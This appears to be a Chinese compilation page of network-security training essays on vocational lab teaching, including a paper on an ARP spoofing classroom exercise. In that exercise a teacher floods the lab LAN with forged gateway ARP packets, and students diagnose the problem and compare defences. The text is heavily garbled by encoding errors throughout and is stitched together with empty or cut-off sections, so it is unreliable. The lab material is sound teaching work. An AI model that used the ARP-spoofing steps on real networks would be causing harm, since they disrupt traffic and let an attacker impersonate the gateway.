開篇:寫作不僅是一種記錄���,更是一種創(chuàng)造����,它讓我們能夠捕捉那些稍縱即逝的靈感����,將它們永久地定格在紙上��。下面是小編精心整理的12篇網(wǎng)絡(luò)安全實(shí)訓(xùn)總結(jié)�,希望這些內(nèi)容能成為您創(chuàng)作過程中的良師益友����,陪伴您不斷探索和進(jìn)步。
第1篇
1.1校企共建實(shí)訓(xùn)教材
職業(yè)院校的培養(yǎng)目標(biāo)是技能型應(yīng)用人才。通過和企業(yè)合作可以加強(qiáng)學(xué)生的就業(yè)能力���,首先對企業(yè)進(jìn)行調(diào)查研究,針對企業(yè)網(wǎng)絡(luò)對人才的應(yīng)用需求,依照企業(yè)崗位所要求的職業(yè)技能,與企業(yè)共建實(shí)訓(xùn)教材。要參照國家相關(guān)的職業(yè)資格標(biāo)準(zhǔn)�����,改革課程項(xiàng)目實(shí)訓(xùn)的教學(xué)內(nèi)容��,實(shí)現(xiàn)企業(yè)和學(xué)院共同編寫實(shí)訓(xùn)教材的方案[3]107-108����。我們編寫的校本實(shí)訓(xùn)教材適合學(xué)生的水平和需求���,不但提高了學(xué)生學(xué)習(xí)興趣���,而且讓他們從實(shí)踐中提高了網(wǎng)絡(luò)技術(shù)實(shí)際應(yīng)用能力�����。
1.2搭建實(shí)訓(xùn)虛擬平臺
網(wǎng)絡(luò)技術(shù)專業(yè)課程原理較多并且設(shè)置復(fù)雜,如果單純地使用裸機(jī)和真實(shí)設(shè)備來配置����,不僅不能滿足需求�,而且設(shè)備昂貴��,易于損壞��。項(xiàng)目實(shí)訓(xùn)實(shí)驗(yàn)結(jié)合企業(yè)網(wǎng)絡(luò)工程項(xiàng)目,按照企業(yè)網(wǎng)絡(luò)實(shí)施流程來完成案例[4]25-27��。實(shí)訓(xùn)中采用Windows Server�、Linux和GNS3軟件和ASA防火墻等模擬路由器和防火墻,讓虛擬機(jī)和真實(shí)機(jī)橋接����。該仿真平臺使教師教學(xué)方式靈活�,學(xué)生不但易于理解和實(shí)現(xiàn)�,而且調(diào)動了學(xué)生的學(xué)習(xí)積極性。使用虛擬機(jī)軟件VMware練習(xí)操作系統(tǒng)的安裝����、設(shè)置和維護(hù)�����,避免因?qū)W生的誤操作對系統(tǒng)造成損壞使實(shí)訓(xùn)終止。它能幫助學(xué)生順利地在計(jì)算機(jī)上安裝操作系統(tǒng)�,完成修改和設(shè)置而不影響真機(jī)的正常運(yùn)作���。使用模擬軟件進(jìn)行路由器和交換機(jī)的配置�,實(shí)現(xiàn)真實(shí)的網(wǎng)絡(luò)環(huán)境��,讓學(xué)生能夠在模擬軟件中體會到路由器����、交換機(jī)在企業(yè)網(wǎng)絡(luò)環(huán)境中的具體應(yīng)用和配置�,為以后的網(wǎng)絡(luò)安全管理工作奠定基礎(chǔ)。
1.3企業(yè)案例實(shí)訓(xùn)
案例實(shí)訓(xùn)是在實(shí)踐中學(xué)習(xí)��,將所學(xué)知識應(yīng)用在實(shí)驗(yàn)中����。通過對案例的學(xué)習(xí),學(xué)生可以掌握Windows Server���、Linux操作系統(tǒng)的安裝、設(shè)置����、維護(hù)和管理�����,學(xué)會橋架、管線�、機(jī)柜和六大子系統(tǒng)的綜合布線�,熟悉交換機(jī)��、路由器���、防火墻和無線AP等的配置管理���。企業(yè)案例的選取來源于企業(yè),學(xué)生根據(jù)實(shí)訓(xùn)的目標(biāo)�,采取小組討論選取組長��、資料查閱記錄、流程實(shí)施和報(bào)告撰寫等形式完成實(shí)訓(xùn)任務(wù)�。教師在施工現(xiàn)場有選擇地指導(dǎo)��,由小組長答辯,教師根據(jù)實(shí)訓(xùn)中出現(xiàn)的問題進(jìn)行解答,最后評定實(shí)訓(xùn)成績�。企業(yè)案例實(shí)訓(xùn)培養(yǎng)了學(xué)生的職業(yè)技能���。在項(xiàng)目實(shí)訓(xùn)中�,從網(wǎng)絡(luò)環(huán)境構(gòu)建�、操作系統(tǒng)設(shè)置、網(wǎng)絡(luò)設(shè)備安裝、網(wǎng)絡(luò)設(shè)備安全配置到安全測試驗(yàn)證,一整套的項(xiàng)目實(shí)訓(xùn)下來,學(xué)生獲取工作中有用的知識����,教學(xué)中做到知識訓(xùn)練與實(shí)際工程項(xiàng)目職業(yè)能力銜接��,為職業(yè)院校提供新的實(shí)踐教學(xué)模式。網(wǎng)絡(luò)設(shè)備的安全技術(shù)內(nèi)容也是一個(gè)重要的實(shí)踐內(nèi)容,讓實(shí)踐教學(xué)充分體現(xiàn)職業(yè)教育的特點(diǎn)�。
1.4企業(yè)頂崗實(shí)訓(xùn)
1學(xué)生頂崗實(shí)訓(xùn)
首先完成章節(jié)項(xiàng)目的實(shí)訓(xùn)���,章節(jié)項(xiàng)目的實(shí)訓(xùn)是小案例實(shí)訓(xùn)�����,結(jié)合每一章節(jié)的具體內(nèi)容來實(shí)施。其首先使用模擬軟件來模擬�,然后用虛擬機(jī)安裝相應(yīng)的軟件來實(shí)施網(wǎng)絡(luò)操作系統(tǒng)設(shè)置���、交換機(jī)���、路由器和防火墻安全案例�����。對于Windows Server的高級設(shè)置和維護(hù)、Linux的安全管理、ACL配置、NAT和防火墻等技術(shù),講解時(shí)要精講����,項(xiàng)目案例實(shí)訓(xùn)時(shí)要精練�。其次完成綜合項(xiàng)目的實(shí)訓(xùn)�����。綜合實(shí)訓(xùn)是在本課程全部完成后進(jìn)行����,根據(jù)企業(yè)網(wǎng)絡(luò)實(shí)際需求搭建安全和便于管理的網(wǎng)絡(luò)�。模擬企業(yè)網(wǎng)絡(luò)環(huán)境,組建企業(yè)網(wǎng)絡(luò),進(jìn)行網(wǎng)絡(luò)操作系統(tǒng)搭建、網(wǎng)絡(luò)環(huán)境的構(gòu)建和網(wǎng)絡(luò)安全技術(shù)的技能訓(xùn)練�����。通過項(xiàng)目綜合實(shí)訓(xùn)學(xué)習(xí)�,學(xué)生能夠根據(jù)企業(yè)辦公環(huán)境、需要的信息點(diǎn)數(shù)量以及網(wǎng)絡(luò)拓?fù)鋱D進(jìn)行綜合布線�����,安裝和設(shè)置操作系統(tǒng)��,配置交換機(jī)����、路由器和防火墻安全設(shè)備�����,使用管理軟件監(jiān)控企業(yè)網(wǎng)絡(luò)的運(yùn)行狀態(tài)�����,并采取安全技術(shù)保證企業(yè)網(wǎng)絡(luò)的安全�,使其正常運(yùn)作。最后是頂崗實(shí)訓(xùn)���,安排學(xué)生到企業(yè)進(jìn)行實(shí)訓(xùn),切實(shí)感受真實(shí)網(wǎng)絡(luò)環(huán)境�����,發(fā)現(xiàn)網(wǎng)絡(luò)安全隱患��,掌握網(wǎng)絡(luò)操作技術(shù)���、網(wǎng)絡(luò)設(shè)備配置技術(shù)和網(wǎng)絡(luò)安全管理技術(shù)����,提高處理網(wǎng)絡(luò)故障的實(shí)際能力��。項(xiàng)目實(shí)訓(xùn)的成績考核方式要靈活�����,將企業(yè)和學(xué)校雙方結(jié)合,給學(xué)生以中肯的評價(jià)�,以能力為主���,為學(xué)生就業(yè)打下堅(jiān)實(shí)的基礎(chǔ)��。
2教師頂崗實(shí)訓(xùn)
深入企業(yè)第一線,了解企業(yè)網(wǎng)絡(luò)所需要的工作崗位和技術(shù)能力��,全面跟蹤學(xué)習(xí)綜合布線�����、網(wǎng)絡(luò)應(yīng)用操作、網(wǎng)絡(luò)安全管理和網(wǎng)絡(luò)云計(jì)算服務(wù)等方面的技術(shù)崗位��;然后反饋到網(wǎng)絡(luò)技術(shù)專業(yè)教學(xué)實(shí)踐改革中�����,更新校企共建實(shí)訓(xùn)教材���,將企業(yè)中的新知識���、新技術(shù)和新的管理理念引入�����,做好與企業(yè)網(wǎng)絡(luò)技術(shù)人員的良好溝通��,豐富實(shí)訓(xùn)教材內(nèi)容,提高教學(xué)質(zhì)量����。
2總結(jié)
第2篇
關(guān)鍵詞:網(wǎng)絡(luò)安全�;實(shí)驗(yàn)教學(xué)�����;教學(xué)設(shè)計(jì)�����;教學(xué)手段
中圖分類號:TP393 文獻(xiàn)標(biāo)識碼:A 文章編號:1009-3044(2016)31-0107-03
1 引言
網(wǎng)絡(luò)安全課程本身原理部分晦澀難以理解,實(shí)驗(yàn)部分涉及技術(shù)眾多�����,涵蓋多個(gè)專業(yè)課程的知識點(diǎn)�,因此也是一門與其他學(xué)科交叉性極強(qiáng)的實(shí)踐性課程��。根據(jù)學(xué)科特點(diǎn)和崗位能力培養(yǎng)目標(biāo)�,從基本學(xué)情出發(fā)��,研究設(shè)計(jì)了符合教學(xué)目標(biāo)和學(xué)生認(rèn)知特點(diǎn)的教學(xué)方案���,有效完成了教學(xué)任務(wù)�����,提高了學(xué)生的學(xué)習(xí)能力
2 教學(xué)基本情況分析
網(wǎng)絡(luò)的便捷帶給用戶很多網(wǎng)絡(luò)使用效率的困擾,包括帶寬擁塞����、關(guān)鍵應(yīng)用的服務(wù)質(zhì)量QoS無法保障����、病毒請求消耗帶寬�、網(wǎng)絡(luò)攻擊導(dǎo)致服務(wù)中斷等問題。上網(wǎng)行為管理作為網(wǎng)絡(luò)安全管理的重要內(nèi)容,能夠?qū)嵤﹥?nèi)容審計(jì)、行為監(jiān)控與行為管理�,同時(shí)可以動態(tài)靈活控制網(wǎng)絡(luò)速率和流量帶寬�,很好地滿足各行業(yè)網(wǎng)絡(luò)安全管理的需要��。
同時(shí)���,上網(wǎng)行為管理也是計(jì)算機(jī)技術(shù)專業(yè)的“網(wǎng)絡(luò)安全與運(yùn)維”典型工作任務(wù)中的一個(gè)技術(shù)技能訓(xùn)練單元����。在專業(yè)職業(yè)崗位需求分析的基礎(chǔ)上確定了本實(shí)訓(xùn)單元的技術(shù)技能訓(xùn)練要求���。課程內(nèi)容根據(jù)《網(wǎng)絡(luò)安全與防護(hù)》課程標(biāo)準(zhǔn)中制定�����,同時(shí)參考了神州數(shù)碼網(wǎng)絡(luò)安全崗位認(rèn)證系列教材的相關(guān)內(nèi)容。我們依據(jù)技術(shù)技能人才培養(yǎng)方案,立足地區(qū)網(wǎng)絡(luò)安全管理人才需求�����,結(jié)合學(xué)院現(xiàn)有設(shè)備優(yōu)勢�,將實(shí)訓(xùn)的內(nèi)容設(shè)計(jì)為上網(wǎng)行為管理的基本概念、常用設(shè)備及架構(gòu)�、校園網(wǎng)絡(luò)上網(wǎng)行為管理的規(guī)劃與實(shí)施�����、上網(wǎng)行為管理的日常運(yùn)維與分析四個(gè)部分[2]�����。
教學(xué)對象是高職高專二年級學(xué)生,已經(jīng)具備計(jì)算機(jī)網(wǎng)絡(luò)基礎(chǔ)知識、路由與交換���、局域網(wǎng)組建等相關(guān)知識和技術(shù)技能。但尚未達(dá)到網(wǎng)絡(luò)安全運(yùn)維的實(shí)踐能力要求,隱形知識也有待顯化。從往屆生的學(xué)習(xí)情況來看�����,課后對知識的復(fù)習(xí)鞏固性練習(xí)積極性不高��。尤其是對動手配置的內(nèi)容��,很多同學(xué)只能按照教材按部就班地進(jìn)行,不善于思考,只限于對配置操作的記憶��。因此結(jié)合技術(shù)技能人才培養(yǎng)要求���,我們以職業(yè)技能訓(xùn)練和崗位能力培養(yǎng)為教學(xué)組織原則���,結(jié)合案例分析���、實(shí)際操作�����、模擬現(xiàn)場、課后實(shí)踐等多種方式進(jìn)行實(shí)踐內(nèi)容教學(xué)�,充分利用實(shí)訓(xùn)室現(xiàn)有網(wǎng)絡(luò)設(shè)備和各類信息化教學(xué)平臺和手段�����,突出“以學(xué)生為主體”和“學(xué)做合一”的特點(diǎn),完成本次教學(xué)任務(wù)�����。
基于以上分析�,教學(xué)目標(biāo)確定為三方面。首先是知識目標(biāo)����。要求學(xué)生掌握上網(wǎng)行為管理的基本概念��,熟悉上網(wǎng)行為管理常用設(shè)備,了解此類設(shè)備的關(guān)鍵技術(shù)����,熟悉上網(wǎng)行為管理常用架構(gòu)��。二是技能目標(biāo),學(xué)生能夠規(guī)劃校園網(wǎng)絡(luò)上網(wǎng)行為管理方案�����,能夠?qū)嵤┥暇W(wǎng)行為管理方案���,能夠?qū)ΤR娫O(shè)備進(jìn)行運(yùn)維管理及分析�。三是素養(yǎng)目標(biāo)方面�����,希望學(xué)生具備安全操作意識�����,有用良好合作協(xié)調(diào)能力、自我學(xué)習(xí)能力和創(chuàng)新和應(yīng)變能力[3]�。
3 教學(xué)設(shè)計(jì)
3.1 課前活動
為了培養(yǎng)學(xué)生的自我學(xué)習(xí)和自我管理能力���,同時(shí)利用網(wǎng)絡(luò)教學(xué)平臺突破空間限制�����,擴(kuò)展師生互動范圍�����,提升學(xué)生個(gè)性化和差異化的學(xué)習(xí)體驗(yàn)。教師會在課前上傳課前任務(wù)書�����、學(xué)習(xí)資源����、考核標(biāo)準(zhǔn)到超星網(wǎng)絡(luò)教學(xué)平臺����,并通過該平臺預(yù)學(xué)習(xí)任務(wù);同時(shí)�,通過超星移動APP���、QQ群�����、微信預(yù)習(xí)通知;教師收到學(xué)生的課前測驗(yàn)結(jié)果后,及時(shí)批改測驗(yàn)結(jié)果���,了解不同學(xué)生的認(rèn)知基礎(chǔ)的差異,靈活調(diào)整課堂教學(xué)策略,適當(dāng)調(diào)整教學(xué)方法�。學(xué)生收到預(yù)習(xí)通知后查看任務(wù)書��;針對本單元中用到的各類硬件設(shè)備,提前調(diào)研其性能及技術(shù)參數(shù);同時(shí)學(xué)生可以利用實(shí)驗(yàn)室的環(huán)境設(shè)備進(jìn)行安全的探索操作�;完成課前預(yù)習(xí)報(bào)告后學(xué)生提交到超星網(wǎng)絡(luò)教學(xué)平臺并在平臺上獨(dú)立完成課前評價(jià)表的填寫��。
3.2 課堂活動
課堂教學(xué)部分,教師首先創(chuàng)設(shè)教學(xué)情境,設(shè)計(jì)出三個(gè)教學(xué)活動����,引導(dǎo)學(xué)生分組討論�����,完成實(shí)驗(yàn)環(huán)境的搭建,從而引出本單元學(xué)習(xí)內(nèi)容�;然后教師利用奧易課堂教學(xué)軟件下發(fā)任務(wù)書���,并做出簡要說明�。在學(xué)生完成過程中針對個(gè)別學(xué)生的提問做差異化指導(dǎo)�,通過奧易教學(xué)軟件統(tǒng)一監(jiān)控。最后教師引導(dǎo)學(xué)生總結(jié)歸納本單元課堂教學(xué)的主要內(nèi)容和實(shí)驗(yàn)思路、故障分析解決思路。
與此同時(shí)學(xué)生要完成一下工作����。首先針對創(chuàng)設(shè)情境,分組討論���、展開頭腦風(fēng)暴并總結(jié)表述討論結(jié)果,復(fù)習(xí)已有知識技能�,獨(dú)立完成實(shí)驗(yàn)環(huán)境的搭建���;其次結(jié)合下發(fā)的任務(wù)書��,組員間討論分析項(xiàng)目的需求,檢查項(xiàng)目實(shí)施的環(huán)境及準(zhǔn)備工作是否完整���。然后討論制定項(xiàng)目計(jì)劃,確定項(xiàng)目實(shí)施的方案���;第三觀看教學(xué)視頻,獨(dú)立完成9個(gè)任務(wù)的實(shí)施和驗(yàn)證���;第四針對拓展任務(wù),分組討論����,分析問題���,提出解決方案���,給出實(shí)施計(jì)劃�����,確定實(shí)施方案�����;第五劃分不同角色��,組員間協(xié)作完成拓展任務(wù)的實(shí)施和驗(yàn)證�;拓展任務(wù)結(jié)束后�,其中一組簡要匯報(bào)任務(wù)的完成情況,由師生對其共同點(diǎn)評�;接下來學(xué)生結(jié)合教師給出的新的網(wǎng)絡(luò)場景��,分析總結(jié)出常見上網(wǎng)行為管理時(shí)有可能出現(xiàn)的網(wǎng)絡(luò)問題,以及常見的分析和解決方法���;最后獨(dú)立完成課堂評價(jià)表的填寫。
3.3 課后活動
第3篇
關(guān)鍵詞:ARP欺騙攻擊���;網(wǎng)絡(luò)安全意識;問題情境��;職業(yè)素質(zhì)
中圖分類號:TP393 文獻(xiàn)標(biāo)識碼:A 文章編號:1009-3044(2015)35-0100-03
Abstract: This paper aims to integrate the network safety consciousness����, real problem situation, professional quality concept into the college experimental teaching process under the strategy of network power�, to stimulate students' enthusiasm and initiative��, and guide students to find, analyze and solve the problem�����, to sum up the experiment in the form of lists. Ultimately����, the "student oriented, supplemented by teachers" teaching ideas are reflected����, and students' practical ability are enhanced.
Key words: ARP spoofing�;network safety consciousness�; problem situation; professional quality
1 引言
2014年來���,中央網(wǎng)絡(luò)安全和信息化領(lǐng)導(dǎo)小組組長多次提出了“沒有網(wǎng)絡(luò)安全就沒有國家安全”以及“建設(shè)網(wǎng)絡(luò)強(qiáng)國”的重要論斷�����。2015年政府工作報(bào)告提出的“互聯(lián)網(wǎng)+行動計(jì)劃” 體現(xiàn)出信息化對網(wǎng)絡(luò)發(fā)展巨大推動作用和以網(wǎng)絡(luò)為載體的數(shù)據(jù)驅(qū)動巨大魅力的同時(shí)�,也呼喚著人們通過網(wǎng)絡(luò)的進(jìn)一步發(fā)展來不斷提升網(wǎng)絡(luò)安全的能力和意識�����。兩屆國家網(wǎng)絡(luò)安全宣傳周活動的開展也為加強(qiáng)全民網(wǎng)絡(luò)安全宣傳教育����、提升網(wǎng)民的網(wǎng)絡(luò)安全防范意識和技能提供了良好的途徑��。
網(wǎng)絡(luò)安全上升到國家戰(zhàn)略層面���,各類網(wǎng)絡(luò)攻擊和竊取事件的頻發(fā)驅(qū)動信息安全需求急劇增加����,目前網(wǎng)絡(luò)安全普遍存在的問題是信息安全意識不強(qiáng)�����、缺乏整體安全方案����、沒有安全管理機(jī)制、系統(tǒng)本身不安全以及缺少必要的安全專才��。
網(wǎng)絡(luò)安全意識比技術(shù)更重要�。作為培養(yǎng)網(wǎng)絡(luò)專業(yè)技能人才的一線高校教師,在平常實(shí)驗(yàn)教學(xué)中除了借助各種安全設(shè)備和環(huán)境完成實(shí)訓(xùn)內(nèi)容外�,更重要的是提升學(xué)生的安全意識和處理安全事故的能力����,在提高專業(yè)技能水平的同時(shí)培養(yǎng)學(xué)生的職業(yè)素質(zhì)����,因此設(shè)計(jì)好網(wǎng)絡(luò)安全實(shí)驗(yàn)課程顯得尤為重要����。本文以ARP欺騙攻擊與防范實(shí)驗(yàn)教學(xué)為例,探索在真實(shí)網(wǎng)絡(luò)安全情境下,新型安全課程實(shí)驗(yàn)教學(xué)模式的改革以及教學(xué)效果��。
2 ARP欺騙攻擊原理
ARP協(xié)議是以太網(wǎng)等數(shù)據(jù)鏈路層的基礎(chǔ)協(xié)議��,負(fù)責(zé)完成IP地址到硬件地址的映射�。工作過程簡述如下:1)當(dāng)主機(jī)或者網(wǎng)絡(luò)設(shè)備需要解析一個(gè)IP地址對應(yīng)的MAC地址時(shí)�,會廣播發(fā)送ARP請求報(bào)文。2)主機(jī)或者網(wǎng)絡(luò)設(shè)備接收到ARP請求后����,會進(jìn)行應(yīng)答�����。同時(shí),根據(jù)請求發(fā)送者的IP地址和MAC地址的對應(yīng)關(guān)系建立ARP表項(xiàng)。3)發(fā)起請求的主機(jī)或者網(wǎng)絡(luò)設(shè)備接收到應(yīng)答后���,同樣會將應(yīng)答報(bào)文中發(fā)送者的IP地址和MAC地址的映射關(guān)系記錄下來,生成ARP表項(xiàng)。從ARP工作機(jī)制可以看出�,ARP協(xié)議簡單易用����,但是卻沒有任何安全機(jī)制���,攻擊者可以發(fā)送偽造ARP報(bào)文對網(wǎng)絡(luò)進(jìn)行攻擊��。偽造ARP報(bào)文具有如下特點(diǎn):偽造的ARP報(bào)文中源MAC地址/目的MAC地址和以太網(wǎng)幀封裝中的源MAC地址/目的MAC地址不一致;偽造的ARP報(bào)文中源IP地址和源MAC地址的映射關(guān)系不是合法用戶真實(shí)的映射關(guān)系�。目前主要的ARP攻擊方式有如下幾類:仿冒網(wǎng)關(guān)攻擊��、仿冒用戶攻擊(欺騙網(wǎng)關(guān)或者其他主機(jī))、泛洪攻擊�����。
3 問題情境設(shè)計(jì)
教學(xué)情境是課堂教學(xué)的基本要素����,有價(jià)值的教學(xué)情境一定是內(nèi)含問題的情境,它能有效地引發(fā)學(xué)生的思考���。問題情境的創(chuàng)設(shè),對于學(xué)生學(xué)習(xí)興趣的激發(fā)起著決定作用�。因此����,如何設(shè)計(jì)具有一定情緒色彩的���、以形象為主體的生動具體的場景�,以激發(fā)學(xué)生一定的情感,就成為教學(xué)之初需要考慮的問題�。
在一個(gè)沒有防御的園區(qū)網(wǎng)中爆發(fā)的ARP病毒會造成網(wǎng)絡(luò)丟包����、不能訪問網(wǎng)關(guān)�����、IP地址沖突等問題����,實(shí)驗(yàn)室所有主機(jī)分配的是同一網(wǎng)段IP地址���,接入交換機(jī)��,預(yù)先在教師機(jī)上開啟Sniffer嗅探者軟件�����,運(yùn)行數(shù)據(jù)包發(fā)生器,修改后的ARP廣播報(bào)文會持續(xù)被發(fā)送到當(dāng)前局域網(wǎng)中��,為學(xué)生建立一個(gè)真實(shí)園區(qū)網(wǎng)面臨的問題情境�����,接下來引導(dǎo)學(xué)生按照“發(fā)現(xiàn)問題-分析問題-解決問題”的順序完成實(shí)驗(yàn)內(nèi)容���,提升自己的安全意識和實(shí)踐能力���。
4 實(shí)施過程
4.1 實(shí)驗(yàn)環(huán)境
實(shí)驗(yàn)室所有主機(jī)處于同一網(wǎng)段���,類似如下所示的拓?fù)鋱D環(huán)境:
4.2 問題情境的構(gòu)造
教師機(jī)IP地址為172.16.75.105�,在本實(shí)驗(yàn)中充當(dāng)攻擊者身份�。首先構(gòu)造用于攻擊的ARP欺騙報(bào)文,在Sniffer軟件上定義好過濾器后�,開始捕獲報(bào)文���,首先將教師機(jī)的ARP緩存清空�,嘗試PING網(wǎng)關(guān)��,停止捕獲并顯示結(jié)果如下圖所示��,
發(fā)送當(dāng)前的幀之前做如下修改:(1)更改源IP地址為網(wǎng)關(guān)IP地址;(2)更改源MAC地址為偽造的MAC 地址11-22-33-44-55-66�����;(3)更改目的IP地址為任一同網(wǎng)段主機(jī)IP地址����;(4)更改目的MAC地址為全F值���。設(shè)置為連續(xù)不斷地發(fā)送幀����,啟動數(shù)據(jù)幀發(fā)生器,此時(shí)當(dāng)前網(wǎng)段會充斥著此類ARP廣播報(bào)文�。
4.3 問題情境的呈現(xiàn)
以4-5人為一組���,以真實(shí)的網(wǎng)絡(luò)管理員遇到的企業(yè)局域網(wǎng)故障為案例���,向?qū)W生說明經(jīng)常受到的網(wǎng)絡(luò)攻擊來自于網(wǎng)絡(luò)內(nèi)部����,表現(xiàn)為訪問互聯(lián)網(wǎng)時(shí)斷時(shí)續(xù)�����,打開網(wǎng)頁或下載文件的速度明顯變慢����,甚至無法訪問公司的Web服務(wù)器等資源��,嚴(yán)重影響了企業(yè)辦公業(yè)務(wù)的正常運(yùn)行�,公司領(lǐng)導(dǎo)對此很不滿意���,要求立刻徹底解決問題�。要求在實(shí)驗(yàn)報(bào)告上完成每步測試內(nèi)容并填寫檢查結(jié)果����。此環(huán)節(jié)注重引入職業(yè)教育理念,既要注重技能鍛煉,又要注意素質(zhì)培養(yǎng)�。立足本職崗位���,敢于承擔(dān)責(zé)任�,從工作中發(fā)現(xiàn)問題是什么,為什么到怎么做,同時(shí)培養(yǎng)學(xué)生的團(tuán)隊(duì)意識��。
4.4發(fā)現(xiàn)問題
此環(huán)節(jié)旨在讓學(xué)生運(yùn)用已掌握的網(wǎng)絡(luò)維護(hù)技能發(fā)現(xiàn)當(dāng)前局域網(wǎng)存在的問題�,通過觀察學(xué)生在測試環(huán)節(jié)中采用的方法,可以了解到學(xué)生能否快速有效地定位網(wǎng)絡(luò)中的故障,在不投入新的設(shè)備情況下解決問題。
通過觀察��,多數(shù)學(xué)生會按照如下測試步驟檢測網(wǎng)絡(luò)狀況:1)檢查本機(jī)網(wǎng)絡(luò)連接情況及IP地址是否有效�;2)檢查與同一網(wǎng)段內(nèi)其余主機(jī)連接情況;3)檢查與網(wǎng)關(guān)連接情況;4)檢查與DNS服務(wù)器連接情況;5)檢查與Web服務(wù)器連接情況。這一過程旨在幫助學(xué)生基于收集到的測試數(shù)據(jù)判斷問題癥結(jié)點(diǎn)的能力,只有在充分調(diào)查研究的基礎(chǔ)上具體問題具體分析���,才能把存在的問題癥結(jié)點(diǎn)找準(zhǔn)、找實(shí)、找透�,才能開對方子���,做到對癥下藥���。
4.5分析問題
根據(jù)課堂反映來看�����,絕大多數(shù)學(xué)生在實(shí)施到第3步時(shí)發(fā)現(xiàn)PING網(wǎng)關(guān)IP地址不通,并且重啟機(jī)器后癥狀依舊,沒過多久又會產(chǎn)生丟包現(xiàn)象���。不少學(xué)生通過使用ARP -a命令發(fā)現(xiàn)學(xué)習(xí)到的網(wǎng)關(guān)MAC地址是偽造的11-22-33-44-55-66,進(jìn)而判斷出問題在于網(wǎng)關(guān)MAC地址被篡改,通過使用Sniffer軟件,可以嗅探到局域網(wǎng)內(nèi)充斥著大量的ARP報(bào)文,并且通過抓包分析����,發(fā)現(xiàn)源IP地址為172.16.75.254的網(wǎng)關(guān)的MAC地址為11-22-33-44-55-66��。此時(shí)需要引導(dǎo)學(xué)生去思考兩個(gè)問題:一是為什么主機(jī)會無條件更新��,二是如何防范此類錯誤�。結(jié)合課本上提到的TCP/IP協(xié)議棧的脆弱性���,部分同學(xué)會得出主機(jī)并不對收到的ARP報(bào)文進(jìn)行檢查����,從而導(dǎo)致PC主機(jī)更新本機(jī)ARP緩存里的網(wǎng)關(guān)MAC地址的結(jié)論。
這個(gè)分析問題的過程注重培養(yǎng)學(xué)生遇到問題的應(yīng)變能力��,這種能力的訓(xùn)練對于今后可能從事的網(wǎng)絡(luò)運(yùn)維崗位而言���,是非常有必要的��。
4.6 解決問題
明白了問題的原因��,如何解決問題就是一個(gè)水到渠成的過程。通過幾分鐘分組討論的形式�,最后總結(jié)了幾組的意見�,歸納出兩種解決思路:一是主機(jī)對于收到的ARP偽造報(bào)文不進(jìn)行更新操作����,二是限制此類ARP廣播報(bào)文在局域網(wǎng)內(nèi)的泛洪。此時(shí)�����,結(jié)合實(shí)訓(xùn)指導(dǎo)書內(nèi)容�����,教師提出兩種解決方案讓學(xué)生選擇���,一是在局域網(wǎng)內(nèi)各臺主機(jī)上靜態(tài)綁定正確的網(wǎng)關(guān)MAC地址��,這樣即使主機(jī)收到了虛假M(fèi)AC地址也不予以更新��;二是在交換機(jī)各端口上設(shè)置單位時(shí)間內(nèi)允許通過的ARP報(bào)文數(shù)量的閾值�,超過閾值則關(guān)閉端口�。同時(shí)讓學(xué)生分組討論,對這兩種方案的優(yōu)缺點(diǎn)進(jìn)行比較�����,最終得出如下的結(jié)論���,方案一因?yàn)橐诰钟蚓W(wǎng)內(nèi)每臺主機(jī)上配置命令��,工作量較大���,網(wǎng)關(guān)MAC地址一旦改變又得重新配置�,而且治標(biāo)不治本,不能有效遏制網(wǎng)段內(nèi)ARP報(bào)文造成的廣播風(fēng)暴�����,網(wǎng)絡(luò)傳輸性能較低����;方案二只需在交換機(jī)端口上進(jìn)行配置,與網(wǎng)關(guān)MAC地址無關(guān)�,如果再在端口上劃分好VLAN����,將會進(jìn)一步限制廣播報(bào)文的傳輸范圍��。
4.7 實(shí)驗(yàn)總結(jié)
總結(jié)既是自己對于實(shí)驗(yàn)的理解歸納�,也是對整個(gè)實(shí)驗(yàn)過程的回放����,既要總結(jié)有所收獲的地方����,也要?dú)w納出不足之處。通過將實(shí)驗(yàn)全過程中涉及現(xiàn)象、情境及步驟列成問題清單,讓每位學(xué)生都能從實(shí)驗(yàn)中總結(jié)出得與失��。最后借鑒翻轉(zhuǎn)課堂的思想�,邀請一位學(xué)生就實(shí)驗(yàn)?zāi)康摹⒎椒ā⒉襟E進(jìn)行口頭陳述��,由其余學(xué)生進(jìn)行補(bǔ)充��,從而獲得更深層次的理解��。
5 結(jié)語
通過網(wǎng)絡(luò)安全實(shí)驗(yàn)課程的教學(xué)嘗試,以及學(xué)生的反映來看,收到了一定成效��?�?偨Y(jié)起來達(dá)到了三個(gè)目的����,一是探索網(wǎng)絡(luò)安全意識��、網(wǎng)絡(luò)安全技能并重的新型網(wǎng)絡(luò)安全實(shí)驗(yàn)教學(xué)方法�,二是引導(dǎo)學(xué)生進(jìn)入實(shí)際問題情境中���,深入角色�����,積極主動地去發(fā)現(xiàn)��、分析及解決問題,三是將個(gè)人責(zé)任感、團(tuán)隊(duì)合作等職業(yè)化素質(zhì)理念融入到教學(xué)過程當(dāng)中���,培養(yǎng)主人公意識。在教學(xué)過程中需要注意對于課堂進(jìn)度以及時(shí)間的把握,如學(xué)生遇到難點(diǎn)應(yīng)及時(shí)進(jìn)行引導(dǎo),推動進(jìn)程。
參考文獻(xiàn):
[1] 遲恩宇��,劉天飛����,楊建毅����,王東.網(wǎng)絡(luò)安全與防護(hù)[M].電子工業(yè)出版社,2009.
[2] 葉成緒.校園網(wǎng)中基于ARP協(xié)議的欺騙及其預(yù)防[J].青海大學(xué)學(xué)報(bào): 自然科學(xué)版�,2007(3):59-61.
[3] 秦豐林��,段海新,郭汝廷.ARP欺騙的監(jiān)測與防范技術(shù)綜述[J].計(jì)算機(jī)應(yīng)用研究�����,2009(1):30-33.
[4] 孟令健.計(jì)算機(jī)網(wǎng)絡(luò)安全ARP攻擊行為的防范研究[J].齊齊哈爾大學(xué)學(xué)報(bào): 自然科學(xué)版��,2013(3):9-11.
[5] 郭會茹����,楊斌,牛立全.ARP攻擊原理分析及其安全防范措施[J].網(wǎng)絡(luò)安全技術(shù)與應(yīng)用����,2015(6):5-6.
[6] 劉名卓�,趙娜.網(wǎng)絡(luò)教學(xué)設(shè)計(jì)樣式的研究與實(shí)踐[J].遠(yuǎn)程教育雜志�,2013(3):79-86.
第4篇
